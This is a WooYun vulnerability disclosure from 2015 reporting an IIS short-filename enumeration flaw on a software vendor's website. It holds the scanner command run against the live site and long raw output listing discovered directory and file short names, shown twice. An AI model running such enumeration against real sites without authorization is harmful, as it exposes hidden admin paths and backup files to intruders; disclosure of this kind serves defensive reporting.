当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119558

漏洞标题:品高软件某站短文件名漏洞

相关厂商:bingocc.com

漏洞作者: 0c0c0f

提交时间:2015-06-10 15:18

修复时间:2015-06-15 15:20

公开时间:2015-06-15 15:20

漏洞类型:系统/服务运维配置不当

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个漏洞的意义何在:
猜解后台地址
猜解敏感文件,例如备份的rar、zip、.bak、.SQL文件等。
在某些情形下,甚至可以通过短文件名web直接下载对应的文件。比如下载备份SQL文件。

详细说明:

以下域名存在iis短文件名漏洞
http://www.bingosoft.net/
证明如下:
[root@pentest scan]# python iis_shortname_Scan.py http://www.bingosoft.net/
server is vulerable, please wait, scanning...
Found /b**** [scan in progress]
Found /a**** [scan in progress]
Found /c**** [scan in progress]
Found /d**** [scan in progress]
Found /h**** [scan in progress]
Found /i**** [scan in progress]
Found /n**** [scan in progress]
Found /m**** [scan in progress]
Found /s**** [scan in progress]
Found /t**** [scan in progress]
Found /w**** [scan in progress]
Found /ba**** [scan in progress]
Found /ab**** [scan in progress]
Found /cl**** [scan in progress]
Found /do**** [scan in progress]
Found /dy**** [scan in progress]
Found /hr**** [scan in progress]
Found /in**** [scan in progress]
Found /ne**** [scan in progress]
Found /ma**** [scan in progress]
Found /se**** [scan in progress]
Found /so**** [scan in progress]
Found /te**** [scan in progress]
Found /we**** [scan in progress]
Found /bai**** [scan in progress]
Found /abd**** [scan in progress]
Found /abo**** [scan in progress]
Found /ab6**** [scan in progress]
Found /clu**** [scan in progress]
Found /dow**** [scan in progress]
Found /dya**** [scan in progress]
Found /dyn**** [scan in progress]
Found /dy6**** [scan in progress]
Found /hra**** [scan in progress]
Found /hrf**** [scan in progress]
Found /hr6**** [scan in progress]
Found /hr8**** [scan in progress]
Found /hr_**** [scan in progress]
Found /hr-**** [scan in progress]
Found /ind**** [scan in progress]
Found /ned**** [scan in progress]
Found /neb**** [scan in progress]
Found /new**** [scan in progress]
Found /ne2**** [scan in progress]
Found /ne1**** [scan in progress]
Found /ne7**** [scan in progress]
Found /ne9**** [scan in progress]
Found /ne5**** [scan in progress]
Found /mar**** [scan in progress]
Found /see**** [scan in progress]
Found /sef**** [scan in progress]
Found /sea**** [scan in progress]
Found /ser**** [scan in progress]
Found /se1**** [scan in progress]
Found /se6**** [scan in progress]
Found /se4**** [scan in progress]
Found /se8**** [scan in progress]
Found /se7**** [scan in progress]
Found /soc**** [scan in progress]
Found /sof**** [scan in progress]
Found /so9**** [scan in progress]
Found /so8**** [scan in progress]
Found /tem**** [scan in progress]
Found /web**** [scan in progress]
Found /baid**** [scan in progress]
Found /abd9**** [scan in progress]
Found /abou**** [scan in progress]
Found /ab63**** [scan in progress]
Found /club**** [scan in progress]
Found /down**** [scan in progress]
Found /dya7**** [scan in progress]
Found /dyna**** [scan in progress]
Found /dy63**** [scan in progress]
Found /hra5**** [scan in progress]
Found /hra7**** [scan in progress]
Found /hrf4**** [scan in progress]
Found /hr61**** [scan in progress]
Found /hr8c**** [scan in progress]
Found /hr8e**** [scan in progress]
Found /hr83**** [scan in progress]
Found /hr_n**** [scan in progress]
Found /hr-a**** [scan in progress]
Found /hr-f**** [scan in progress]
Found /hr-h**** [scan in progress]
Found /hr-n**** [scan in progress]
Found /hr-p**** [scan in progress]
Found /hr-s**** [scan in progress]
Found /hr-r**** [scan in progress]
Found /hr-x**** [scan in progress]
Found /hr-z**** [scan in progress]
Found /inde**** [scan in progress]
Found /indu**** [scan in progress]
Found /ned4**** [scan in progress]
Found /neb3**** [scan in progress]
Found /news**** [scan in progress]
Found /ne24**** [scan in progress]
Found /ne13**** [scan in progress]
Found /ne70**** [scan in progress]
Found /ne99**** [scan in progress]
Found /ne5f**** [scan in progress]
Found /ne57**** [scan in progress]
Found /mark**** [scan in progress]
Found /seea**** [scan in progress]
Found /sef5**** [scan in progress]
Found /sea8**** [scan in progress]
Found /serv**** [scan in progress]
Found /se1f**** [scan in progress]
Found /se15**** [scan in progress]
Found /se62**** [scan in progress]
Found /se4e**** [scan in progress]
Found /se8b**** [scan in progress]
Found /se75**** [scan in progress]
Found /socd**** [scan in progress]
Found /soft**** [scan in progress]
Found /so9a**** [scan in progress]
Found /so99**** [scan in progress]
Found /so82**** [scan in progress]
Found /so88**** [scan in progress]
Found /temp**** [scan in progress]
Found /baidu**** [scan in progress]
Found /abd9e**** [scan in progress]
Found /about**** [scan in progress]
Found /ab631**** [scan in progress]
Found /downl**** [scan in progress]
Found /dya71**** [scan in progress]
Found /dynam**** [scan in progress]
Found /dy639**** [scan in progress]
Found /hra56**** [scan in progress]
Found /hra58**** [scan in progress]
Found /hra7f**** [scan in progress]
Found /hrf48**** [scan in progress]
Found /hr61c**** [scan in progress]
Found /hr8c1**** [scan in progress]
Found /hr8ea**** [scan in progress]
Found /hr8e8**** [scan in progress]
Found /hr830**** [scan in progress]
Found /hr_ne**** [scan in progress]
Found /hr-af**** [scan in progress]
Found /hr-fa**** [scan in progress]
Found /hr-ho**** [scan in progress]
Found /hr-hu**** [scan in progress]
Found /hr-ne**** [scan in progress]
Found /hr-pe**** [scan in progress]
Found /hr-so**** [scan in progress]
Found /hr-re**** [scan in progress]
Found /hr-xi**** [scan in progress]
Found /hr-zh**** [scan in progress]
Found /index**** [scan in progress]
Found /indus**** [scan in progress]
Found /ned4f**** [scan in progress]
Found /neb3e**** [scan in progress]
Found /newsa**** [scan in progress]
Found /news1**** [scan in progress]
Found /news2**** [scan in progress]
Found /ne24a**** [scan in progress]
Found /ne136**** [scan in progress]
Found /ne703**** [scan in progress]
Found /ne999**** [scan in progress]
Found /ne5f1**** [scan in progress]
Found /ne57c**** [scan in progress]
Found /marke**** [scan in progress]
Found /seea0**** [scan in progress]
Found /sef5c**** [scan in progress]
Found /sea83**** [scan in progress]
Found /servi**** [scan in progress]
Found /se1f2**** [scan in progress]
Found /se15e**** [scan in progress]
Found /se627**** [scan in progress]
Found /se4e5**** [scan in progress]
Found /se8bd**** [scan in progress]
Found /se754**** [scan in progress]
Found /socd8**** [scan in progress]
Found /softw**** [scan in progress]
Found /so9a2**** [scan in progress]
Found /so99e**** [scan in progress]
Found /so820**** [scan in progress]
Found /so88a**** [scan in progress]
Found /templ**** [scan in progress]
Found /baidu_**** [scan in progress]
Found /abd9e4**** [scan in progress]
Found /about-**** [scan in progress]
Found /ab6315**** [scan in progress]
Found /downlo**** [scan in progress]
Found /dya71c**** [scan in progress]
Found /dynami**** [scan in progress]
Found /dy639b**** [scan in progress]
Found /hra567**** [scan in progress]
Found /hra588**** [scan in progress]
Found /hra7fd**** [scan in progress]
Found /hrf482**** [scan in progress]
Found /hr61c4**** [scan in progress]
Found /hr8c11**** [scan in progress]
Found /hr8ea7**** [scan in progress]
Found /hr8e86**** [scan in progress]
Found /hr8300**** [scan in progress]
Found /hr_new**** [scan in progress]
Found /hr-aff**** [scan in progress]
Found /hr-faz**** [scan in progress]
Found /hr-hou**** [scan in progress]
Found /hr-hum**** [scan in progress]
Found /hr-new**** [scan in progress]
Found /hr-pei**** [scan in progress]
Found /hr-soc**** [scan in progress]
Found /hr-rec**** [scan in progress]
Found /hr-xin**** [scan in progress]
Found /hr-zhi**** [scan in progress]
Found /indust**** [scan in progress]
Found /ned4f8**** [scan in progress]
Found /neb3e5**** [scan in progress]
Found /newsad**** [scan in progress]
Found /news1-**** [scan in progress]
Found /news2-**** [scan in progress]
Found /ne24ab**** [scan in progress]
Found /ne136b**** [scan in progress]
Found /ne7039**** [scan in progress]
Found /ne9990**** [scan in progress]
Found /ne5f16**** [scan in progress]
Found /ne57c1**** [scan in progress]
Found /market**** [scan in progress]
Found /seea02**** [scan in progress]
Found /sef5c7**** [scan in progress]
Found /sea833**** [scan in progress]
Found /servic**** [scan in progress]
Found /se1f2f**** [scan in progress]
Found /se15ef**** [scan in progress]
Found /se6274**** [scan in progress]
Found /se4e55**** [scan in progress]
Found /se8bdb**** [scan in progress]
Found /se7543**** [scan in progress]
Found /socd8f**** [scan in progress]
Found /softwa**** [scan in progress]
Found /so9a2f**** [scan in progress]
Found /so99ef**** [scan in progress]
Found /so8208**** [scan in progress]
Found /so88af**** [scan in progress]
Found /templa**** [scan in progress]
Found /baidu_*h** [scan in progress]
Found /baidu_*m** [scan in progress]
Found /baidu_*t** [scan in progress]
Found /abd9e4*h** [scan in progress]
Found /abd9e4*m** [scan in progress]
Found /abd9e4*t** [scan in progress]
Found /about-*h** [scan in progress]
Found /about-*m** [scan in progress]
Found /about-*t** [scan in progress]
Found /ab6315*h** [scan in progress]
Found /ab6315*m** [scan in progress]
Found /ab6315*t** [scan in progress]
Found /downlo [scan in progress]
Found Dir /downlo~1 [Done]
Found /dya71c*h** [scan in progress]
Found /dya71c*m** [scan in progress]
Found /dya71c*t** [scan in progress]
Found /dynami*h** [scan in progress]
Found /dynami*m** [scan in progress]
Found /dynami*t** [scan in progress]
Found /dy639b*h** [scan in progress]
Found /dy639b*m** [scan in progress]
Found /dy639b*t** [scan in progress]
Found /hra567*h** [scan in progress]
Found /hra567*m** [scan in progress]
Found /hra567*t** [scan in progress]
Found /hra588*h** [scan in progress]
Found /hra588*m** [scan in progress]
Found /hra588*t** [scan in progress]
Found /hra7fd*h** [scan in progress]
Found /hra7fd*m** [scan in progress]
Found /hra7fd*t** [scan in progress]
Found /hrf482*h** [scan in progress]
Found /hrf482*m** [scan in progress]
Found /hrf482*t** [scan in progress]
Found /hr61c4*h** [scan in progress]
Found /hr61c4*m** [scan in progress]
Found /hr61c4*t** [scan in progress]
Found /hr8c11*h** [scan in progress]
Found /hr8c11*m** [scan in progress]
Found /hr8c11*t** [scan in progress]
Found /hr8ea7*h** [scan in progress]
Found /hr8ea7*m** [scan in progress]
Found /hr8ea7*t** [scan in progress]
Found /hr8e86*h** [scan in progress]
Found /hr8e86*m** [scan in progress]
Found /hr8e86*t** [scan in progress]
Found /hr8300*h** [scan in progress]
Found /hr8300*m** [scan in progress]
Found /hr8300*t** [scan in progress]
Found /hr_new*h** [scan in progress]
Found /hr_new*m** [scan in progress]
Found /hr_new*t** [scan in progress]
Found /hr-aff*h** [scan in progress]
Found /hr-aff*m** [scan in progress]
Found /hr-aff*t** [scan in progress]
Found /hr-faz*h** [scan in progress]
Found /hr-faz*m** [scan in progress]
Found /hr-faz*t** [scan in progress]
Found /hr-hou*h** [scan in progress]
Found /hr-hou*m** [scan in progress]
Found /hr-hou*t** [scan in progress]
Found /hr-hum*h** [scan in progress]
Found /hr-hum*m** [scan in progress]
Found /hr-hum*t** [scan in progress]
Found /hr-new*h** [scan in progress]
Found /hr-new*m** [scan in progress]
Found /hr-new*t** [scan in progress]
Found /hr-pei*h** [scan in progress]
Found /hr-pei*m** [scan in progress]
Found /hr-pei*t** [scan in progress]
Found /hr-soc*m** [scan in progress]
Found /hr-soc*h** [scan in progress]
Found /hr-soc*t** [scan in progress]
Found /hr-rec*h** [scan in progress]
Found /hr-rec*m** [scan in progress]
Found /hr-rec*t** [scan in progress]
Found /hr-xin*h** [scan in progress]
Found /hr-xin*m** [scan in progress]
Found /hr-xin*t** [scan in progress]
Found /hr-zhi*h** [scan in progress]
Found /hr-zhi*m** [scan in progress]
Found /hr-zhi*t** [scan in progress]
Found /indust*h** [scan in progress]
Found /indust*m** [scan in progress]
Found /indust*t** [scan in progress]
Found /ned4f8*h** [scan in progress]
Found /ned4f8*m** [scan in progress]
Found /ned4f8*t** [scan in progress]
Found /neb3e5*h** [scan in progress]
Found /neb3e5*m** [scan in progress]
Found /neb3e5*t** [scan in progress]
Found /newsad*h** [scan in progress]
Found /newsad*m** [scan in progress]
Found /newsad*t** [scan in progress]
Found /news1-*h** [scan in progress]
Found /news1-*m** [scan in progress]
Found /news1-*t** [scan in progress]
Found /news2-*h** [scan in progress]
Found /news2-*m** [scan in progress]
Found /news2-*t** [scan in progress]
Found /ne24ab*m** [scan in progress]
Found /ne24ab*h** [scan in progress]
Found /ne24ab*t** [scan in progress]
Found /ne136b*h** [scan in progress]
Found /ne136b*m** [scan in progress]
Found /ne136b*t** [scan in progress]
Found /ne7039*h** [scan in progress]
Found /ne7039*m** [scan in progress]
Found /ne7039*t** [scan in progress]
Found /ne9990*h** [scan in progress]
Found /ne9990*m** [scan in progress]
Found /ne9990*t** [scan in progress]
Found /ne5f16*h** [scan in progress]
Found /ne5f16*m** [scan in progress]
Found /ne5f16*t** [scan in progress]
Found /ne57c1*h** [scan in progress]
Found /ne57c1*m** [scan in progress]
Found /ne57c1*t** [scan in progress]
Found /market*h** [scan in progress]
Found /market*m** [scan in progress]
Found /market*t** [scan in progress]
Found /seea02*h** [scan in progress]
Found /seea02*m** [scan in progress]
Found /seea02*t** [scan in progress]
Found /sef5c7*h** [scan in progress]
Found /sef5c7*m** [scan in progress]
Found /sef5c7*t** [scan in progress]
Found /sea833*h** [scan in progress]
Found /sea833*m** [scan in progress]
Found /sea833*t** [scan in progress]
Found /servic*h** [scan in progress]
Found /servic*m** [scan in progress]
Found /servic*t** [scan in progress]
Found /se1f2f*h** [scan in progress]
Found /se1f2f*m** [scan in progress]
Found /se1f2f*t** [scan in progress]
Found /se15ef*h** [scan in progress]
Found /se15ef*m** [scan in progress]
Found /se15ef*t** [scan in progress]
Found /se6274*h** [scan in progress]
Found /se6274*m** [scan in progress]
Found /se6274*t** [scan in progress]
Found /se4e55*h** [scan in progress]
Found /se4e55*m** [scan in progress]
Found /se4e55*t** [scan in progress]
Found /se8bdb*h** [scan in progress]
Found /se8bdb*m** [scan in progress]
Found /se8bdb*t** [scan in progress]
Found /se7543*h** [scan in progress]
Found /se7543*m** [scan in progress]
Found /se7543*t** [scan in progress]
Found /socd8f*m** [scan in progress]
Found /socd8f*h** [scan in progress]
Found /socd8f*t** [scan in progress]
Found /softwa*h** [scan in progress]
Found /softwa*m** [scan in progress]
Found /softwa*t** [scan in progress]
Found /so9a2f*h** [scan in progress]
Found /so9a2f*m** [scan in progress]
Found /so9a2f*t** [scan in progress]
Found /so99ef*h** [scan in progress]
Found /so99ef*m** [scan in progress]
Found /so99ef*t** [scan in progress]
Found /so8208*m** [scan in progress]
Found /so8208*h** [scan in progress]
Found /so8208*t** [scan in progress]
Found /so88af*m** [scan in progress]
Found /so88af*h** [scan in progress]
Found /so88af*t** [scan in progress]
Found /templa [scan in progress]
Found Dir /templa~1 [Done]
Found /baidu_*ht* [scan in progress]
Found /baidu_*tm* [scan in progress]
Found /abd9e4*ht* [scan in progress]
Found /abd9e4*tm* [scan in progress]
Found /about-*ht* [scan in progress]
Found /about-*tm* [scan in progress]
Found /ab6315*ht* [scan in progress]
Found /ab6315*tm* [scan in progress]
Found /dya71c*ht* [scan in progress]
Found /dya71c*tm* [scan in progress]
Found /dynami*ht* [scan in progress]
Found /dynami*tm* [scan in progress]
Found /dy639b*ht* [scan in progress]
Found /dy639b*tm* [scan in progress]
Found /hra567*ht* [scan in progress]
Found /hra567*tm* [scan in progress]
Found /hra588*ht* [scan in progress]
Found /hra588*tm* [scan in progress]
Found /hra7fd*ht* [scan in progress]
Found /hra7fd*tm* [scan in progress]
Found /hrf482*ht* [scan in progress]
Found /hrf482*tm* [scan in progress]
Found /hr61c4*ht* [scan in progress]
Found /hr61c4*tm* [scan in progress]
Found /hr8c11*ht* [scan in progress]
Found /hr8c11*tm* [scan in progress]
Found /hr8ea7*ht* [scan in progress]
Found /hr8ea7*tm* [scan in progress]
Found /hr8e86*ht* [scan in progress]
Found /hr8e86*tm* [scan in progress]
Found /hr8300*ht* [scan in progress]
Found /hr8300*tm* [scan in progress]
Found /hr_new*ht* [scan in progress]
Found /hr_new*tm* [scan in progress]
Found /hr-aff*ht* [scan in progress]
Found /hr-aff*tm* [scan in progress]
Found /hr-faz*ht* [scan in progress]
Found /hr-faz*tm* [scan in progress]
Found /hr-hou*ht* [scan in progress]
Found /hr-hou*tm* [scan in progress]
Found /hr-hum*ht* [scan in progress]
Found /hr-hum*tm* [scan in progress]
Found /hr-new*ht* [scan in progress]
Found /hr-new*tm* [scan in progress]
Found /hr-pei*ht* [scan in progress]
Found /hr-pei*tm* [scan in progress]
Found /hr-soc*ht* [scan in progress]
Found /hr-soc*tm* [scan in progress]
Found /hr-rec*ht* [scan in progress]
Found /hr-rec*tm* [scan in progress]
Found /hr-xin*ht* [scan in progress]
Found /hr-xin*tm* [scan in progress]
Found /hr-zhi*ht* [scan in progress]
Found /hr-zhi*tm* [scan in progress]
Found /indust*ht* [scan in progress]
Found /indust*tm* [scan in progress]
Found /ned4f8*ht* [scan in progress]
Found /ned4f8*tm* [scan in progress]
Found /neb3e5*ht* [scan in progress]
Found /neb3e5*tm* [scan in progress]
Found /newsad*ht* [scan in progress]
Found /newsad*tm* [scan in progress]
Found /news1-*ht* [scan in progress]
Found /news1-*tm* [scan in progress]
Found /news2-*ht* [scan in progress]
Found /news2-*tm* [scan in progress]
Found /ne24ab*ht* [scan in progress]
Found /ne24ab*tm* [scan in progress]
Found /ne136b*ht* [scan in progress]
Found /ne136b*tm* [scan in progress]
Found /ne7039*ht* [scan in progress]
Found /ne7039*tm* [scan in progress]
Found /ne9990*ht* [scan in progress]
Found /ne9990*tm* [scan in progress]
Found /ne5f16*ht* [scan in progress]
Found /ne5f16*tm* [scan in progress]
Found /ne57c1*ht* [scan in progress]
Found /ne57c1*tm* [scan in progress]
Found /market*ht* [scan in progress]
Found /market*tm* [scan in progress]
Found /seea02*ht* [scan in progress]
Found /seea02*tm* [scan in progress]
Found /sef5c7*ht* [scan in progress]
Found /sef5c7*tm* [scan in progress]
Found /sea833*ht* [scan in progress]
Found /sea833*tm* [scan in progress]
Found /servic*ht* [scan in progress]
Found /servic*tm* [scan in progress]
Found /se1f2f*ht* [scan in progress]
Found /se1f2f*tm* [scan in progress]
Found /se15ef*ht* [scan in progress]
Found /se15ef*tm* [scan in progress]
Found /se6274*ht* [scan in progress]
Found /se6274*tm* [scan in progress]
Found /se4e55*ht* [scan in progress]
Found /se4e55*tm* [scan in progress]
Found /se8bdb*ht* [scan in progress]
Found /se8bdb*tm* [scan in progress]
Found /se7543*ht* [scan in progress]
Found /se7543*tm* [scan in progress]
Found /socd8f*ht* [scan in progress]
Found /socd8f*tm* [scan in progress]
Found /softwa*ht* [scan in progress]
Found /softwa*tm* [scan in progress]
Found /so9a2f*ht* [scan in progress]
Found /so9a2f*tm* [scan in progress]
Found /so99ef*ht* [scan in progress]
Found /so99ef*tm* [scan in progress]
Found /so8208*ht* [scan in progress]
Found /so8208*tm* [scan in progress]
Found /so88af*ht* [scan in progress]
Found /so88af*tm* [scan in progress]
Found /baidu_*htm [scan in progress]
Found File /baidu_~1.htm [Done]
Found /abd9e4*htm [scan in progress]
Found File /abd9e4~1.htm [Done]
Found /about-*htm [scan in progress]
Found File /about-~1.htm [Done]
Found /ab6315*htm [scan in progress]
Found File /ab6315~1.htm [Done]
Found /dya71c*htm [scan in progress]
Found File /dya71c~1.htm [Done]
Found /dynami*htm [scan in progress]
Found File /dynami~1.htm [Done]
Found /dy639b*htm [scan in progress]
Found File /dy639b~1.htm [Done]
Found /hra567*htm [scan in progress]
Found File /hra567~1.htm [Done]
Found /hra588*htm [scan in progress]
Found File /hra588~1.htm [Done]
Found /hra7fd*htm [scan in progress]
Found File /hra7fd~1.htm [Done]
Found /hrf482*htm [scan in progress]
Found File /hrf482~1.htm [Done]
Found /hr61c4*htm [scan in progress]
Found File /hr61c4~1.htm [Done]
Found /hr8c11*htm [scan in progress]
Found File /hr8c11~1.htm [Done]
Found /hr8ea7*htm [scan in progress]
Found File /hr8ea7~1.htm [Done]
Found /hr8e86*htm [scan in progress]
Found File /hr8e86~1.htm [Done]
Found /hr8300*htm [scan in progress]
Found File /hr8300~1.htm [Done]
Found /hr_new*htm [scan in progress]
Found File /hr_new~1.htm [Done]
Found /hr-aff*htm [scan in progress]
Found File /hr-aff~1.htm [Done]
Found /hr-faz*htm [scan in progress]
Found File /hr-faz~1.htm [Done]
Found /hr-hou*htm [scan in progress]
Found File /hr-hou~1.htm [Done]
Found /hr-hum*htm [scan in progress]
Found File /hr-hum~1.htm [Done]
Found /hr-new*htm [scan in progress]
Found File /hr-new~1.htm [Done]
Found /hr-pei*htm [scan in progress]
Found File /hr-pei~1.htm [Done]
Found /hr-soc*htm [scan in progress]
Found File /hr-soc~1.htm [Done]
Found /hr-rec*htm [scan in progress]
Found File /hr-rec~1.htm [Done]
Found /hr-xin*htm [scan in progress]
Found File /hr-xin~1.htm [Done]
Found /hr-zhi*htm [scan in progress]
Found File /hr-zhi~1.htm [Done]
Found /indust*htm [scan in progress]
Found File /indust~1.htm [Done]
Found /ned4f8*htm [scan in progress]
Found File /ned4f8~1.htm [Done]
Found /neb3e5*htm [scan in progress]
Found File /neb3e5~1.htm [Done]
Found /newsad*htm [scan in progress]
Found File /newsad~1.htm [Done]
Found /news1-*htm [scan in progress]
Found File /news1-~1.htm [Done]
Found /news2-*htm [scan in progress]
Found File /news2-~1.htm [Done]
Found /ne24ab*htm [scan in progress]
Found File /ne24ab~1.htm [Done]
Found /ne136b*htm [scan in progress]
Found File /ne136b~1.htm [Done]
Found /ne7039*htm [scan in progress]
Found File /ne7039~1.htm [Done]
Found /ne9990*htm [scan in progress]
Found File /ne9990~1.htm [Done]
Found /ne5f16*htm [scan in progress]
Found File /ne5f16~1.htm [Done]
Found /ne57c1*htm [scan in progress]
Found File /ne57c1~1.htm [Done]
Found /market*htm [scan in progress]
Found File /market~1.htm [Done]
Found /seea02*htm [scan in progress]
Found File /seea02~1.htm [Done]
Found /sef5c7*htm [scan in progress]
Found File /sef5c7~1.htm [Done]
Found /sea833*htm [scan in progress]
Found File /sea833~1.htm [Done]
Found /servic*htm [scan in progress]
Found File /servic~1.htm [Done]
Found /se1f2f*htm [scan in progress]
Found File /se1f2f~1.htm [Done]
Found /se15ef*htm [scan in progress]
Found File /se15ef~1.htm [Done]
Found /se6274*htm [scan in progress]
Found File /se6274~1.htm [Done]
Found /se4e55*htm [scan in progress]
Found File /se4e55~1.htm [Done]
Found /se8bdb*htm [scan in progress]
Found File /se8bdb~1.htm [Done]
Found /se7543*htm [scan in progress]
Found File /se7543~1.htm [Done]
Found /socd8f*htm [scan in progress]
Found File /socd8f~1.htm [Done]
Found /softwa*htm [scan in progress]
Found File /softwa~1.htm [Done]
Found /so9a2f*htm [scan in progress]
Found File /so9a2f~1.htm [Done]
Found /so99ef*htm [scan in progress]
Found File /so99ef~1.htm [Done]
Found /so8208*htm [scan in progress]
Found File /so8208~1.htm [Done]
Found /so88af*htm [scan in progress]
Found File /so88af~1.htm [Done]
----------------------------------------------------------------
Dir: /downlo~1
Dir: /templa~1
File: /baidu_~1.htm
File: /abd9e4~1.htm
File: /about-~1.htm
File: /ab6315~1.htm
File: /dya71c~1.htm
File: /dynami~1.htm
File: /dy639b~1.htm
File: /hra567~1.htm
File: /hra588~1.htm
File: /hra7fd~1.htm
File: /hrf482~1.htm
File: /hr61c4~1.htm
File: /hr8c11~1.htm
File: /hr8ea7~1.htm
File: /hr8e86~1.htm
File: /hr8300~1.htm
File: /hr_new~1.htm
File: /hr-aff~1.htm
File: /hr-faz~1.htm
File: /hr-hou~1.htm
File: /hr-hum~1.htm
File: /hr-new~1.htm
File: /hr-pei~1.htm
File: /hr-soc~1.htm
File: /hr-rec~1.htm
File: /hr-xin~1.htm
File: /hr-zhi~1.htm
File: /indust~1.htm
File: /ned4f8~1.htm
File: /neb3e5~1.htm
File: /newsad~1.htm
File: /news1-~1.htm
File: /news2-~1.htm
File: /ne24ab~1.htm
File: /ne136b~1.htm
File: /ne7039~1.htm
File: /ne9990~1.htm
File: /ne5f16~1.htm
File: /ne57c1~1.htm
File: /market~1.htm
File: /seea02~1.htm
File: /sef5c7~1.htm
File: /sea833~1.htm
File: /servic~1.htm
File: /se1f2f~1.htm
File: /se15ef~1.htm
File: /se6274~1.htm
File: /se4e55~1.htm
File: /se8bdb~1.htm
File: /se7543~1.htm
File: /socd8f~1.htm
File: /softwa~1.htm
File: /so9a2f~1.htm
File: /so99ef~1.htm
File: /so8208~1.htm
File: /so88af~1.htm
----------------------------------------------------------------
2 Directories, 56 Files found in toal

漏洞证明:

[root@pentest scan]# python iis_shortname_Scan.py http://www.bingosoft.net/
server is vulerable, please wait, scanning...
Found /b**** [scan in progress]
Found /a**** [scan in progress]
Found /c**** [scan in progress]
Found /d**** [scan in progress]
Found /h**** [scan in progress]
Found /i**** [scan in progress]
Found /n**** [scan in progress]
Found /m**** [scan in progress]
Found /s**** [scan in progress]
Found /t**** [scan in progress]
Found /w**** [scan in progress]
Found /ba**** [scan in progress]
Found /ab**** [scan in progress]
Found /cl**** [scan in progress]
Found /do**** [scan in progress]
Found /dy**** [scan in progress]
Found /hr**** [scan in progress]
Found /in**** [scan in progress]
Found /ne**** [scan in progress]
Found /ma**** [scan in progress]
Found /se**** [scan in progress]
Found /so**** [scan in progress]
Found /te**** [scan in progress]
Found /we**** [scan in progress]
Found /bai**** [scan in progress]
Found /abd**** [scan in progress]
Found /abo**** [scan in progress]
Found /ab6**** [scan in progress]
Found /clu**** [scan in progress]
Found /dow**** [scan in progress]
Found /dya**** [scan in progress]
Found /dyn**** [scan in progress]
Found /dy6**** [scan in progress]
Found /hra**** [scan in progress]
Found /hrf**** [scan in progress]
Found /hr6**** [scan in progress]
Found /hr8**** [scan in progress]
Found /hr_**** [scan in progress]
Found /hr-**** [scan in progress]
Found /ind**** [scan in progress]
Found /ned**** [scan in progress]
Found /neb**** [scan in progress]
Found /new**** [scan in progress]
Found /ne2**** [scan in progress]
Found /ne1**** [scan in progress]
Found /ne7**** [scan in progress]
Found /ne9**** [scan in progress]
Found /ne5**** [scan in progress]
Found /mar**** [scan in progress]
Found /see**** [scan in progress]
Found /sef**** [scan in progress]
Found /sea**** [scan in progress]
Found /ser**** [scan in progress]
Found /se1**** [scan in progress]
Found /se6**** [scan in progress]
Found /se4**** [scan in progress]
Found /se8**** [scan in progress]
Found /se7**** [scan in progress]
Found /soc**** [scan in progress]
Found /sof**** [scan in progress]
Found /so9**** [scan in progress]
Found /so8**** [scan in progress]
Found /tem**** [scan in progress]
Found /web**** [scan in progress]
Found /baid**** [scan in progress]
Found /abd9**** [scan in progress]
Found /abou**** [scan in progress]
Found /ab63**** [scan in progress]
Found /club**** [scan in progress]
Found /down**** [scan in progress]
Found /dya7**** [scan in progress]
Found /dyna**** [scan in progress]
Found /dy63**** [scan in progress]
Found /hra5**** [scan in progress]
Found /hra7**** [scan in progress]
Found /hrf4**** [scan in progress]
Found /hr61**** [scan in progress]
Found /hr8c**** [scan in progress]
Found /hr8e**** [scan in progress]
Found /hr83**** [scan in progress]
Found /hr_n**** [scan in progress]
Found /hr-a**** [scan in progress]
Found /hr-f**** [scan in progress]
Found /hr-h**** [scan in progress]
Found /hr-n**** [scan in progress]
Found /hr-p**** [scan in progress]
Found /hr-s**** [scan in progress]
Found /hr-r**** [scan in progress]
Found /hr-x**** [scan in progress]
Found /hr-z**** [scan in progress]
Found /inde**** [scan in progress]
Found /indu**** [scan in progress]
Found /ned4**** [scan in progress]
Found /neb3**** [scan in progress]
Found /news**** [scan in progress]
Found /ne24**** [scan in progress]
Found /ne13**** [scan in progress]
Found /ne70**** [scan in progress]
Found /ne99**** [scan in progress]
Found /ne5f**** [scan in progress]
Found /ne57**** [scan in progress]
Found /mark**** [scan in progress]
Found /seea**** [scan in progress]
Found /sef5**** [scan in progress]
Found /sea8**** [scan in progress]
Found /serv**** [scan in progress]
Found /se1f**** [scan in progress]
Found /se15**** [scan in progress]
Found /se62**** [scan in progress]
Found /se4e**** [scan in progress]
Found /se8b**** [scan in progress]
Found /se75**** [scan in progress]
Found /socd**** [scan in progress]
Found /soft**** [scan in progress]
Found /so9a**** [scan in progress]
Found /so99**** [scan in progress]
Found /so82**** [scan in progress]
Found /so88**** [scan in progress]
Found /temp**** [scan in progress]
Found /baidu**** [scan in progress]
Found /abd9e**** [scan in progress]
Found /about**** [scan in progress]
Found /ab631**** [scan in progress]
Found /downl**** [scan in progress]
Found /dya71**** [scan in progress]
Found /dynam**** [scan in progress]
Found /dy639**** [scan in progress]
Found /hra56**** [scan in progress]
Found /hra58**** [scan in progress]
Found /hra7f**** [scan in progress]
Found /hrf48**** [scan in progress]
Found /hr61c**** [scan in progress]
Found /hr8c1**** [scan in progress]
Found /hr8ea**** [scan in progress]
Found /hr8e8**** [scan in progress]
Found /hr830**** [scan in progress]
Found /hr_ne**** [scan in progress]
Found /hr-af**** [scan in progress]
Found /hr-fa**** [scan in progress]
Found /hr-ho**** [scan in progress]
Found /hr-hu**** [scan in progress]
Found /hr-ne**** [scan in progress]
Found /hr-pe**** [scan in progress]
Found /hr-so**** [scan in progress]
Found /hr-re**** [scan in progress]
Found /hr-xi**** [scan in progress]
Found /hr-zh**** [scan in progress]
Found /index**** [scan in progress]
Found /indus**** [scan in progress]
Found /ned4f**** [scan in progress]
Found /neb3e**** [scan in progress]
Found /newsa**** [scan in progress]
Found /news1**** [scan in progress]
Found /news2**** [scan in progress]
Found /ne24a**** [scan in progress]
Found /ne136**** [scan in progress]
Found /ne703**** [scan in progress]
Found /ne999**** [scan in progress]
Found /ne5f1**** [scan in progress]
Found /ne57c**** [scan in progress]
Found /marke**** [scan in progress]
Found /seea0**** [scan in progress]
Found /sef5c**** [scan in progress]
